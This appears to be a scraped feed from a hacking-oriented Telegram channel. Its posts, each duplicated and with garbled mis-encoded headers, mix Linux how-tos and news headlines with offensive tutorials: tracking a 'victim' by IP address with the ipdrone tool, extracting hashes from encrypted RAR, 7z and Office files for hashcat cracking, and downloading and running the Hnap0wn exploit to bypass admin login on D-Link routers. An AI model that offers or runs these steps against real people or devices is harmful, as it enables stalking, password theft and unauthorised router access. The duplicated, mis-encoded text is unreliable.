Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Track Location With Live Address And Accuracy In Termux:
[+] Real live location !
[+] Updated maintainence !
[+] Ip lookup
[+] Easy for Beginners !
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt-get update -y
2) apt-get upgrade -y
3) pkg install python -y
4) pkg install python2 -y
5) pkg install git -y
6) pip install lolcat
7) pip install requests
8) git clone https://github.com/noob-hackers/ipdrone
9) cd $HOME
10) ls
11) cd ipdrone
12) ls
13) python ipdrone.py -v (your victim ip here)
ex:- python ipdrone.py -v 127.0,0.1
Hurray... you got his location with some more information
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Track Location With Live Address And Accuracy In Termux:
[+] Real live location !
[+] Updated maintainence !
[+] Ip lookup
[+] Easy for Beginners !
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) apt-get update -y
2) apt-get upgrade -y
3) pkg install python -y
4) pkg install python2 -y
5) pkg install git -y
6) pip install lolcat
7) pip install requests
8) git clone https://github.com/noob-hackers/ipdrone
9) cd $HOME
10) ls
11) cd ipdrone
12) ls
13) python ipdrone.py -v (your victim ip here)
ex:- python ipdrone.py -v 127.0,0.1
Hurray... you got his location with some more information
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - noob-hackers/ipdrone: Track Location With Live Address And Accuracy In Termux
Track Location With Live Address And Accuracy In Termux - noob-hackers/ipdrone
Forwarded from UNDERCODE NEWS
The mass production of the smartphone on Debian Linux "for the paranoid" began
#Technologies #Updates
#Technologies #Updates
Forwarded from UNDERCODE NEWS
Many dangerous vulnerabilities found in famous industrial system products.
#Analytiques #Vulnerabilities
#Analytiques #Vulnerabilities
β β β Uππ»βΊπ«Δπ¬πβ β β β
π© HardInfo - checking hardware information on Linux:
Installing HardInfo
1) HardInfo is the most popular graphical application, tested on Ubuntu / Mint, Debian, OpenSUSE, Fedora / CentOS / RHEL, Arch Linux and Manjaro Linux.
2) HardInfo is available for installation on all major Linux distributions from the default repository.
Installing HardInfo on Debian, Ubuntu and Linux Mint
$ sudo apt install hardinfo
Installing HardInfo on Fedora / CentOS Linux
3) For some reason, the Fedora team decided to stop packaging Hardinfo in the repository, so you will need to build it from source as follows:
# dnf install glib-devel gtk + -devel zlib-devel libsoup-devel
$ cd Downloads
$ git clone https://github.com/lpereira/hardinfo.git
$ cd hardinfo
$ mkdir build
$ cd build
$ cmake ..
$ make
4) # make install
Installing HardInfo on Arch and Manjaro Linux
$ sudo pacman -S hardinfo
Installing HardInfo on OpenSUSE
$ sudo zypper in hardinfo
5) How to use HardInfo on Linux
After installation, open Hardinfo on your computer.
It is a graphical application and should be categorized as System named System Profiler and Benchmark in your distribution's launcher.
6) When it opens, you will see the various tabs on the left sidebar, sorted by category, and the information contained in those tabs listed on the right.
For example, you can view information about your system processor.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π© HardInfo - checking hardware information on Linux:
Installing HardInfo
1) HardInfo is the most popular graphical application, tested on Ubuntu / Mint, Debian, OpenSUSE, Fedora / CentOS / RHEL, Arch Linux and Manjaro Linux.
2) HardInfo is available for installation on all major Linux distributions from the default repository.
Installing HardInfo on Debian, Ubuntu and Linux Mint
$ sudo apt install hardinfo
Installing HardInfo on Fedora / CentOS Linux
3) For some reason, the Fedora team decided to stop packaging Hardinfo in the repository, so you will need to build it from source as follows:
# dnf install glib-devel gtk + -devel zlib-devel libsoup-devel
$ cd Downloads
$ git clone https://github.com/lpereira/hardinfo.git
$ cd hardinfo
$ mkdir build
$ cd build
$ cmake ..
$ make
4) # make install
Installing HardInfo on Arch and Manjaro Linux
$ sudo pacman -S hardinfo
Installing HardInfo on OpenSUSE
$ sudo zypper in hardinfo
5) How to use HardInfo on Linux
After installation, open Hardinfo on your computer.
It is a graphical application and should be categorized as System named System Profiler and Benchmark in your distribution's launcher.
6) When it opens, you will see the various tabs on the left sidebar, sorted by category, and the information contained in those tabs listed on the right.
For example, you can view information about your system processor.
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - lpereira/hardinfo: System profiler and benchmark tool for Linux systems
System profiler and benchmark tool for Linux systems - lpereira/hardinfo
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CI workflow design:
1) The Git code version management system can only manage git from the command line
Gitlab is based on git as a graphical management page, and companies use gitlab as a private code management warehouse
2) Github public code management repository
Build gitlab
3) Set up gitlab to create a working directory first, because some data needs to be persisted
[root@www ~]# mkdir -p /gitlab
[root@www ~]# cd /gitlab/
docker run -d \
--name gitlab \
-p 8443:443 \
-p 9999:80 \
-p 9998:22 \
-v /gitlab/config:/etc/gitlab \
-v /gitlab/logs:/var/log/gitlab \
-v /gitlab/data:/var/opt/gitlab \
-v /etc/localtime:/etc/localtime \
--restart=always \
lizhenliang/gitlab-ce-zh:latest
9999 is web port 8443 web htpps port 9998 ssh port
4) Persist the containerized data to the local host. This image is built after the early Chineseization. The default official image is in English. This is in English. This image is about 1G in size, including database and message queue, which are encapsulated. There is a lot of content.
[root@www gitlab]# docker logs 3396d5ccc518
- execute /opt/gitlab/bin/gitlab-ctl start postgresql
+psql_host='/var/opt/gitlab/postgresql'
Through the log can see which components such as postgresql
5) It may be a bit slow on the first visit, because there are many components, you may have to wait 3-5 minutes
6) now page shows that the gitlab service is started, and other components may not be started successfully. Itβs best to give 4G of physical memory here, if only 2G is not able to start normally, it will be as follows after about eight minutes
The default user name is root. Here you need to set a new password. The new password can be set to qwerasdf with at least 8 characters, and then after updating the password, you can use the root user name and password qwerasdf to log in
Create a private project java-demo
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CI workflow design:
1) The Git code version management system can only manage git from the command line
Gitlab is based on git as a graphical management page, and companies use gitlab as a private code management warehouse
2) Github public code management repository
Build gitlab
3) Set up gitlab to create a working directory first, because some data needs to be persisted
[root@www ~]# mkdir -p /gitlab
[root@www ~]# cd /gitlab/
docker run -d \
--name gitlab \
-p 8443:443 \
-p 9999:80 \
-p 9998:22 \
-v /gitlab/config:/etc/gitlab \
-v /gitlab/logs:/var/log/gitlab \
-v /gitlab/data:/var/opt/gitlab \
-v /etc/localtime:/etc/localtime \
--restart=always \
lizhenliang/gitlab-ce-zh:latest
9999 is web port 8443 web htpps port 9998 ssh port
4) Persist the containerized data to the local host. This image is built after the early Chineseization. The default official image is in English. This is in English. This image is about 1G in size, including database and message queue, which are encapsulated. There is a lot of content.
[root@www gitlab]# docker logs 3396d5ccc518
- execute /opt/gitlab/bin/gitlab-ctl start postgresql
+psql_host='/var/opt/gitlab/postgresql'
Through the log can see which components such as postgresql
5) It may be a bit slow on the first visit, because there are many components, you may have to wait 3-5 minutes
6) now page shows that the gitlab service is started, and other components may not be started successfully. Itβs best to give 4G of physical memory here, if only 2G is not able to start normally, it will be as follows after about eight minutes
The default user name is root. Here you need to set a new password. The new password can be set to qwerasdf with at least 8 characters, and then after updating the password, you can use the root user name and password qwerasdf to log in
Create a private project java-demo
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
In a multi-million dollar fight over Cisco in Russia, Tiny IT business beats Rosenergoatom.
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π How to parse INI config files with Bash:
for pro hackers...
Sample INI file
I will use the following INI config file in the following examples.
[main]
description = Sample configuration
timeout = 10
monitoring_interval = 20
[database]
server = db.example.org
port = 3306
username = dbuser
password = dbpass
[monitor]
servers[] = www.example.org
servers[] = proxy.example.org
servers[] = cache.example.org
servers[] = bastion.example.org
Parse entire INI file
Let's read and analyze the entire INI file.
#!/bin/bash
# Read and parse simple INI file
# Get INI section
ReadINISections(){
local filename="$1"
awk '{ if ($1 ~ /^\[/) section=tolower(gensub(/\[(.+)\]/,"\\1",1,$1)); configuration[section]=1 } END {for (key in configuration) { print key} }' ${filename}
}
# Get/Set all INI sections
GetINISections () {
local filename="$1"
sections="$(ReadINISections $filename)"
for section in $sections; do
array_name="configuration_${section}"
declare -g -A ${array_name}
done
eval $(awk -F= '{
if ($1 ~ /^\[/)
section=tolower(gensub(/\[(.+)\]/,"\\1",1,$1))
else if ($1 !~ /^$/ && $1 !~ /^;/) {
gsub(/^[ \t]+|[ \t]+$/, "", $1);
gsub(/[\[\]]/, "", $1);
gsub(/^[ \t]+|[ \t]+$/, "", $2);
if (configuration[section][$1] == "")
configuration[section][$1]=$2
else
configuration[section][$1]=configuration[section][$1]" "$2}
}
END {
for (section in configuration)
for (key in configuration[section])
print "configuration_"section"[\""key"\"]=\""configuration[section][key]"\";"
}' ${filename}
)
}
if [ "$#" -eq "1" ] && [ -f "$1" ]; then
filename="$1"
GetINISections "$filename"
echo -n "Configuration description: "
if [ -n "${configuration_main["description"]}" ]; then
echo "${configuration_main["description"]}"
else
echo "missing"
be
echo
for section in $(ReadINISections "configuration.ini"); do
echo "[${section}]"
for key in $(eval echo $\{'!'configuration_${section}[@]\}); do
echo -e " ${key} = $(eval echo $\{configuration_${section}[$key]\}) (access it using $(echo $\{configuration_${section}[$key]\}))"
done
done
else
echo "missing INI file"
be
β β β Uππ»βΊπ«Δπ¬πβ β β β
π How to parse INI config files with Bash:
for pro hackers...
Sample INI file
I will use the following INI config file in the following examples.
[main]
description = Sample configuration
timeout = 10
monitoring_interval = 20
[database]
server = db.example.org
port = 3306
username = dbuser
password = dbpass
[monitor]
servers[] = www.example.org
servers[] = proxy.example.org
servers[] = cache.example.org
servers[] = bastion.example.org
Parse entire INI file
Let's read and analyze the entire INI file.
#!/bin/bash
# Read and parse simple INI file
# Get INI section
ReadINISections(){
local filename="$1"
awk '{ if ($1 ~ /^\[/) section=tolower(gensub(/\[(.+)\]/,"\\1",1,$1)); configuration[section]=1 } END {for (key in configuration) { print key} }' ${filename}
}
# Get/Set all INI sections
GetINISections () {
local filename="$1"
sections="$(ReadINISections $filename)"
for section in $sections; do
array_name="configuration_${section}"
declare -g -A ${array_name}
done
eval $(awk -F= '{
if ($1 ~ /^\[/)
section=tolower(gensub(/\[(.+)\]/,"\\1",1,$1))
else if ($1 !~ /^$/ && $1 !~ /^;/) {
gsub(/^[ \t]+|[ \t]+$/, "", $1);
gsub(/[\[\]]/, "", $1);
gsub(/^[ \t]+|[ \t]+$/, "", $2);
if (configuration[section][$1] == "")
configuration[section][$1]=$2
else
configuration[section][$1]=configuration[section][$1]" "$2}
}
END {
for (section in configuration)
for (key in configuration[section])
print "configuration_"section"[\""key"\"]=\""configuration[section][key]"\";"
}' ${filename}
)
}
if [ "$#" -eq "1" ] && [ -f "$1" ]; then
filename="$1"
GetINISections "$filename"
echo -n "Configuration description: "
if [ -n "${configuration_main["description"]}" ]; then
echo "${configuration_main["description"]}"
else
echo "missing"
be
echo
for section in $(ReadINISections "configuration.ini"); do
echo "[${section}]"
for key in $(eval echo $\{'!'configuration_${section}[@]\}); do
echo -e " ${key} = $(eval echo $\{configuration_${section}[$key]\}) (access it using $(echo $\{configuration_${section}[$key]\}))"
done
done
else
echo "missing INI file"
be
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cracking tips with hashcat github:
catCracking RAR archive password
To extract the hash, run a command like this:
rar2john > rar.tmp
For example, the path to the file /mnt/disk_d/Share/test/file.rar , then the command is as follows:
rar2john /mnt/disk_d/Share/test/file.rar > rar.tmp
The hash will be extracted in the John format, this format is unsuitable for Hashcat, so run the following command:
cat rar.tmp | grep -E -o '(\$RAR3\$[^:]+)|(\$rar5\$.*)' > rar.hash
It will clear the hash of unwanted lines and store the hash in a file format Hashcat rar.hash .
But that's not all - there are several versions of RAR. Therefore, we need to correctly determine the type of your hash. You can open the rar.hash file with any text editor or run the following command to print the first 8 characters of the hash:
head -c 8 rar.hash
If the hash string starts with:
$RAR3$*0*
So this is RAR3-hp, hash number: 12500
If the hash string starts with:
$rar5$16$
So this is RAR5, hash number: 13000
If the hash string starts with:
$RAR3$*1*
So this is RAR3-p (Uncompressed), hash number: 23700
If the hash string starts with:
$RAR3$*1*
So this is RAR3-p (Compressed), hash number: 23800
ATTENTION : RAR3-p (Uncompressed) and RAR3-p (Compressed) have the SAME hash beginnings, I don't know how to distinguish them. The only embodiment - taste hashcat run command indicating the type of hash 23700 , and then 23800 . In this case, if you specified the hash type incorrectly, then an error will be displayed immediately. Error example:
Hashfile '/home/mial/rar.hash' on line 1 ($RAR3$...91201eb0007c76714cbb328b2acfc*33): Salt-value exception
No hashes loaded.
If you get errors about missing modules like:
/usr/share/hashcat/modules/module_23700.so: cannot open shared object file: No such file or directory
/usr/share/hashcat/modules/module_23800.so: cannot open shared object file: No such file or directory
This means that your version of Hashcat does not yet support hashes with numbers 23700 and 23800 and you need to update the program to the latest version. Currently, this support is only present in the beta version of Hashcat, which you can download from the official website: https://hashcat.net/beta/
Cracking the 7z archive password
To extract the hash, run a command like this:
7z2john > 7z.tmp
The hash will be extracted in the John format, this format is unsuitable for Hashcat, so run the following command:
cat 7z.tmp | grep -E -o '\$7z\$.*' > 7z.hash
It will clear the hash of unwanted lines and store the hash in a file format Hashcat 7z.hash .
Hash number: 11600
Cracking MS Office password: Word (.DOCX file) and other office files
To extract the hash, run a command like this:
office2john > office.tmp
To prepare the hash, run the command:
cat office.tmp | grep -E -o '\$office\$.*' > office.hash
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Cracking tips with hashcat github:
catCracking RAR archive password
To extract the hash, run a command like this:
rar2john > rar.tmp
For example, the path to the file /mnt/disk_d/Share/test/file.rar , then the command is as follows:
rar2john /mnt/disk_d/Share/test/file.rar > rar.tmp
The hash will be extracted in the John format, this format is unsuitable for Hashcat, so run the following command:
cat rar.tmp | grep -E -o '(\$RAR3\$[^:]+)|(\$rar5\$.*)' > rar.hash
It will clear the hash of unwanted lines and store the hash in a file format Hashcat rar.hash .
But that's not all - there are several versions of RAR. Therefore, we need to correctly determine the type of your hash. You can open the rar.hash file with any text editor or run the following command to print the first 8 characters of the hash:
head -c 8 rar.hash
If the hash string starts with:
$RAR3$*0*
So this is RAR3-hp, hash number: 12500
If the hash string starts with:
$rar5$16$
So this is RAR5, hash number: 13000
If the hash string starts with:
$RAR3$*1*
So this is RAR3-p (Uncompressed), hash number: 23700
If the hash string starts with:
$RAR3$*1*
So this is RAR3-p (Compressed), hash number: 23800
ATTENTION : RAR3-p (Uncompressed) and RAR3-p (Compressed) have the SAME hash beginnings, I don't know how to distinguish them. The only embodiment - taste hashcat run command indicating the type of hash 23700 , and then 23800 . In this case, if you specified the hash type incorrectly, then an error will be displayed immediately. Error example:
Hashfile '/home/mial/rar.hash' on line 1 ($RAR3$...91201eb0007c76714cbb328b2acfc*33): Salt-value exception
No hashes loaded.
If you get errors about missing modules like:
/usr/share/hashcat/modules/module_23700.so: cannot open shared object file: No such file or directory
/usr/share/hashcat/modules/module_23800.so: cannot open shared object file: No such file or directory
This means that your version of Hashcat does not yet support hashes with numbers 23700 and 23800 and you need to update the program to the latest version. Currently, this support is only present in the beta version of Hashcat, which you can download from the official website: https://hashcat.net/beta/
Cracking the 7z archive password
To extract the hash, run a command like this:
7z2john > 7z.tmp
The hash will be extracted in the John format, this format is unsuitable for Hashcat, so run the following command:
cat 7z.tmp | grep -E -o '\$7z\$.*' > 7z.hash
It will clear the hash of unwanted lines and store the hash in a file format Hashcat 7z.hash .
Hash number: 11600
Cracking MS Office password: Word (.DOCX file) and other office files
To extract the hash, run a command like this:
office2john > office.tmp
To prepare the hash, run the command:
cat office.tmp | grep -E -o '\$office\$.*' > office.hash
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
Collaboration between Aion Defense and Exavis to reduce the possibility of network access security.
#international
#international
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hnap0wn-HACK D-LINK WIFI
The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass administrative login for HNAP-enabled D-Link routers.
Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):
1) https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
2) https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz
3) Download and unpack from the command line:
a) mkdir hnap0wn
b) cd hnap0wn
c) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
d) tar xvzf 11101.tar.gz
e) This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device using a password or without a password if the device is vulnerable.
f) In the xml folder that comes with this program, there are several .xml files to do typical things.
Example command:
g) ./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml
There is a result, but I think you cannot read XML files without formatting on the fly. T
How to format XML on the command line " and use one of the utilities it provides. I will be using xmllint ( libxml2-utils package on Debian or libxml2 on Arch Linux).
To have Hnap0wn output valid XML, open the hnap0wn file :
gedit ./hnap0wn
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Hnap0wn-HACK D-LINK WIFI
The Hnap0wn tool was introduced 10 years ago. This is an exploit to bypass administrative login for HNAP-enabled D-Link routers.
Now it can be downloaded from the following links (the versions are not identical! In this tutorial I use the first one):
1) https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
2) https://web.archive.org/web/20140727021850/http://www.sourcesec.com/Lab/hnap0wn.tar.gz
3) Download and unpack from the command line:
a) mkdir hnap0wn
b) cd hnap0wn
c) wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/11101.tar.gz
d) tar xvzf 11101.tar.gz
e) This tool allows you to check if there is a vulnerability that allows you to perform actions without specifying a password, as well as view information from a device using a password or without a password if the device is vulnerable.
f) In the xml folder that comes with this program, there are several .xml files to do typical things.
Example command:
g) ./hnap0wn 172.24.98.25:8080 xml/GetWLanSecurity.xml
There is a result, but I think you cannot read XML files without formatting on the fly. T
How to format XML on the command line " and use one of the utilities it provides. I will be using xmllint ( libxml2-utils package on Debian or libxml2 on Arch Linux).
To have Hnap0wn output valid XML, open the hnap0wn file :
gedit ./hnap0wn
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
130 hijacked celebrity accounts, the whole picture of the unknown Twitter hack.
#CyberAttacks #Leaks
#CyberAttacks #Leaks
